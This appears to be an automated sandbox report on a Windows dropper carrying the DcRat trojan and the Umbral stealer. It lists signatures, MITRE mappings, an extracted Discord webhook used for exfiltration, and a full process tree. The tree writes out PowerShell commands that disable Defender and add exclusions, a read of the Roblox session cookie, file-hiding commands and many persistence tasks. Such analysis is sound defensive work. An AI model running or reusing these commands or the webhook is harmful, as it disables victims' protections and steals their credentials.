Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
-
submitted
24-08-2024 17:19
General
-
Target
392fcfb7445ce64079d2de971877520e.exe
-
Size
3.4MB
-
MD5
392fcfb7445ce64079d2de971877520e
-
SHA1
68b4ab6a88385348fb1808286ac3586c15ef73ef
-
SHA256
294003b3626890da222c7aeb34f7ac71cec614026c686fd88df269cc175a0e8c
-
SHA512
87ee7c6b2c6aa96779ab1c9c38e9ebb8f4c589681af31b164c261d84e86eac6e3e7b62beea1c37db912c2d49cbe28c28f1043f69d0b440328b52a482fc520f1c
-
SSDEEP
98304:h/tCnHVGIBfSIJ7tCHkurtT2zFhuR83VYpBSUKn:JtCHVgG7EttEuR8WpBSUKn
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1273828074898718851/qR9eE6omxJxFL_jVry1J18IsVQ6bHhsk5rGr5VLxyO-92VJHyGPK43BBNMWtaUG56gE2
Signatures
-
DcRat 51 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Detect Umbral payload 2 IoCs
-
Process spawned unexpected child process 48 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
UAC bypass 3 TTPs 6 IoCs
-
Umbral
Umbral stealer is an opensource moduler stealer written in C#.
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
DCRat payload 4 IoCs
Detects payload of DCRat, commonly dropped by NSIS installers.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
-
Sets file to hidden 1 TTPs 2 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Executes dropped EXE 10 IoCs
-
Loads dropped DLL 12 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Checks whether UAC is enabled 1 TTPs 4 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in Program Files directory 6 IoCs
-
Drops file in Windows directory 4 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
Delays execution with timeout.exe 1 IoCs
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Runs ping.exe 1 TTPs 2 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 50 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
System policy modification 1 TTPs 6 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 3 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\392fcfb7445ce64079d2de971877520e.exe"C:\Users\Admin\AppData\Local\Temp\392fcfb7445ce64079d2de971877520e.exe"1⤵
- DcRat
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\loader0.exe"C:\Users\Admin\AppData\Local\Temp\loader0.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\reviewCrt\jVfhzQMFI0iTNziih7b.vbe"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\reviewCrt\tYuCM.bat" "4⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\reviewCrt\AgentDriversession.exe"C:\reviewCrt\AgentDriversession.exe"5⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\2tGB5M5H6x.bat"6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:27⤵
-
-
C:\Users\All Users\Templates\csrss.exe"C:\Users\All Users\Templates\csrss.exe"7⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- System policy modification
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c701a5ae-4a98-456a-b2ae-d9042bb6788a.vbs"8⤵
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a45f633e-9a15-4b24-a1a1-75843b37326b.vbs"8⤵
-
-
C:\Users\Admin\AppData\Local\Temp\VHOIX42053IU9AO.exe"C:\Users\Admin\AppData\Local\Temp\VHOIX42053IU9AO.exe"8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\PortsurrogateWinhostdhcp\ya0aIw.vbe"9⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\PortsurrogateWinhostdhcp\AW1Fe6Q61HGStQsO0.bat" "10⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
C:\PortsurrogateWinhostdhcp\WebReviewWinSvc.exe"C:\PortsurrogateWinhostdhcp/WebReviewWinSvc.exe"11⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\PortsurrogateWinhostdhcp\WmiPrvSE.exe'12⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\reviewCrt\conhost.exe'12⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\reviewCrt\dllhost.exe'12⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Music\Sample Music\csrss.exe'12⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Google\Chrome\Application\SetupMetrics\VSSVC.exe'12⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\PortsurrogateWinhostdhcp\WebReviewWinSvc.exe'12⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\yhzSaU0opI.bat"12⤵
-
C:\Windows\system32\chcp.comchcp 6500113⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost13⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\reviewCrt\conhost.exe"C:\reviewCrt\conhost.exe"13⤵
- Executes dropped EXE
-
-
-
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\reviewCrt\file.vbs"3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Users\Admin\AppData\Local\Temp\installer.exe"C:\Users\Admin\AppData\Local\Temp\installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\WmZWbh4b.exe"C:\Users\Admin\AppData\Local\Temp\WmZWbh4b.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\attrib.exe"C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\Exec"4⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\System32\attrib.exe"C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\Exec\$77svchost.exe"4⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp5699.tmp.bat""4⤵
- Loads dropped DLL
-
C:\Windows\system32\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
-
-
C:\Users\Admin\Exec\$77svchost.exe"C:\Users\Admin\Exec\$77svchost.exe"5⤵
- Executes dropped EXE
-
C:\Windows\system32\schtasks.exe"schtasks.exe" /query /TN $77svchost.exe6⤵
-
-
C:\Windows\system32\schtasks.exe"schtasks.exe" /Create /SC ONCE /TN "$77svchost.exe" /TR "C:\Users\Admin\Exec\$77svchost.exe \"\$77svchost.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST6⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\schtasks.exe"schtasks.exe" /query /TN $77svchost.exe6⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit6⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc daily /tn "svchost_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:006⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"4⤵
- Views/modifies file attributes
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 24⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory4⤵
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid4⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name4⤵
- Detects videocard installed
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause4⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
C:\Windows\system32\PING.EXEping localhost5⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 13 /tr "'C:\Windows\twain_32\wininit.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Windows\twain_32\wininit.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 8 /tr "'C:\Windows\twain_32\wininit.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 8 /tr "'C:\Recovery\3a99bb82-4e15-11ef-8354-cae67966b5f6\WmiPrvSE.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Recovery\3a99bb82-4e15-11ef-8354-cae67966b5f6\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Recovery\3a99bb82-4e15-11ef-8354-cae67966b5f6\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "powershellp" /sc MINUTE /mo 12 /tr "'C:\Users\Default\Recent\powershell.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\Users\Default\Recent\powershell.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "powershellp" /sc MINUTE /mo 9 /tr "'C:\Users\Default\Recent\powershell.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmZWbh4bW" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Sidebar\it-IT\WmZWbh4b.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmZWbh4b" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Sidebar\it-IT\WmZWbh4b.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmZWbh4bW" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows Sidebar\it-IT\WmZWbh4b.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\winlogon.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\winlogon.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\winlogon.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "AgentDriversessionA" /sc MINUTE /mo 7 /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\AgentDriversession.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "AgentDriversession" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\AgentDriversession.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "AgentDriversessionA" /sc MINUTE /mo 13 /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\AgentDriversession.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "powershellp" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Media Player\ja-JP\powershell.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Media Player\ja-JP\powershell.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "powershellp" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Media Player\ja-JP\powershell.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Users\All Users\Templates\csrss.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\All Users\Templates\csrss.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\Templates\csrss.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 11 /tr "'C:\Program Files\Mozilla Firefox\uninstall\sppsvc.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Program Files\Mozilla Firefox\uninstall\sppsvc.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 10 /tr "'C:\Program Files\Mozilla Firefox\uninstall\sppsvc.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 14 /tr "'C:\reviewCrt\WmiPrvSE.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\reviewCrt\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 10 /tr "'C:\reviewCrt\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\PortsurrogateWinhostdhcp\WmiPrvSE.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\PortsurrogateWinhostdhcp\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 5 /tr "'C:\PortsurrogateWinhostdhcp\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 7 /tr "'C:\reviewCrt\conhost.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\reviewCrt\conhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\reviewCrt\conhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\reviewCrt\dllhost.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\reviewCrt\dllhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\reviewCrt\dllhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\Users\Public\Music\Sample Music\csrss.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Public\Music\Sample Music\csrss.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\Users\Public\Music\Sample Music\csrss.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "VSSVCV" /sc MINUTE /mo 6 /tr "'C:\Program Files\Google\Chrome\Application\SetupMetrics\VSSVC.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "VSSVC" /sc ONLOGON /tr "'C:\Program Files\Google\Chrome\Application\SetupMetrics\VSSVC.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "VSSVCV" /sc MINUTE /mo 14 /tr "'C:\Program Files\Google\Chrome\Application\SetupMetrics\VSSVC.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WebReviewWinSvcW" /sc MINUTE /mo 5 /tr "'C:\PortsurrogateWinhostdhcp\WebReviewWinSvc.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WebReviewWinSvc" /sc ONLOGON /tr "'C:\PortsurrogateWinhostdhcp\WebReviewWinSvc.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WebReviewWinSvcW" /sc MINUTE /mo 14 /tr "'C:\PortsurrogateWinhostdhcp\WebReviewWinSvc.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Hide Artifacts
2Hidden Files and Directories
2Impair Defenses
1Disable or Modify Tools
1Modify Registry
3Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
92B
MD57a0242e21fbe67928f8bb2a34df50776
SHA179e56085bc21f93a0f6a6f9141e65e56f15250ac
SHA256bf8d81fbca5474b93fdadc88c08d3c97c8458a4985339b575cfea79cd1808beb
SHA5123a14220e9881aff2a2ee1fb8427e9e546ee08cbea80a753217e0424ecd284cc5284323caadd4592d01e493c74609c77f49249c7305185832de993a6ddd384896
-
Filesize
1.9MB
MD5b9ae6cecac930e2d1ab60253e735a423
SHA1bb4da2c1ca3802ecb9743871daed567fdfec55ed
SHA2561e1a1ba9b92b5c91284b94606192c66fafe90db8c08c1aa748bf990e488f0a57
SHA51204d621a1dcd636c6fd796862f6c982c5715516837d55ef32ecec441a36d0e6d132777c1bad9bffa1b5e264316e4d7969fa7e9d43eb6b68fb5c49034cf67ba93b
-
Filesize
203B
MD5e871c813ce266d8d0b9de626f7f58e84
SHA1fb782aabdccfd2b02c3ad0969d22325cf9aaec16
SHA2561619dc69e17ce371e1768167dda0529adbc503ad3de3890161852153f8f306b3
SHA51254a20a23b0db1794100191ec513044a3f7713eea93f7747f212ccd88a96aa5e30bd3f1b73d1438af9be14f62c430e93507806f8c4cd958afb30d2f8e0359e267
-
Filesize
20KB
MD5c9ff7748d8fcef4cf84a5501e996a641
SHA102867e5010f62f97ebb0cfb32cb3ede9449fe0c9
SHA2564d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988
SHA512d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73
-
Filesize
2.2MB
